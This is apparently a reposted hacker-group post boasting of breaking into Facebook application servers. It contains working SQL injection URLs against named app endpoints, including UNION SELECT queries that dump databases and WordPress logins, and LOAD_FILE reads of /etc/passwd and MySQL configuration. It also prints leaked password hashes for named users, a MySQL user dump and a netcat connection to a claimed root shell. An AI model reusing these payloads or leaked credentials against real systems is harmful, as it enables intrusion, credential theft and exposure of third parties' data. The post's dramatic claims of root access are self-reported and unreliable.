Saludos Mundo Libre.
==============================================================
FaceBook's servers was hacked again by Inj3ct0r Team [part II]
==============================================================
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com
__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/files/facebook_part2.zip
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
[Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities.
Sir Zaid prifile: http://inj3ct0r.com/author/2580
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
[Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...
Brevity the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
[0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
load_file = yes magic_quotes = off
[+] Gathering MySQL Server Configuration...
Database: facebook
User: root@localhost
Version: 5.1.37-1ubuntu5.4
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 4
[0] root::localhost
[1] root::ip-10-128-57-239
[2] root::127.0.0.1
[3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:localhost
[+] Do we have Access to Load_File: YES <-- w00t w00t
[+] Starting Load_File Fuzzer...
[+] Number of tables names to be fuzzed: 236
[!] Found /etc/passwd
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/hosts
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/mysql/my.cnf
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/group
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
goOd =] Nice Hacking old school xD
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Greetz]
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!
31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
Personally h4x0rz:
VMw4r3 (none)
Sir Zaid http://inj3ct0r.com/author/2580
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346
You are good hackers. Respect y0u!
Sir Zaid ( http://inj3ct0r.com/author/2580 ), Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
Friendly projects : darkc0de, Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/files/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]
# Inj3ct0r.com
No hay comentarios:
Publicar un comentario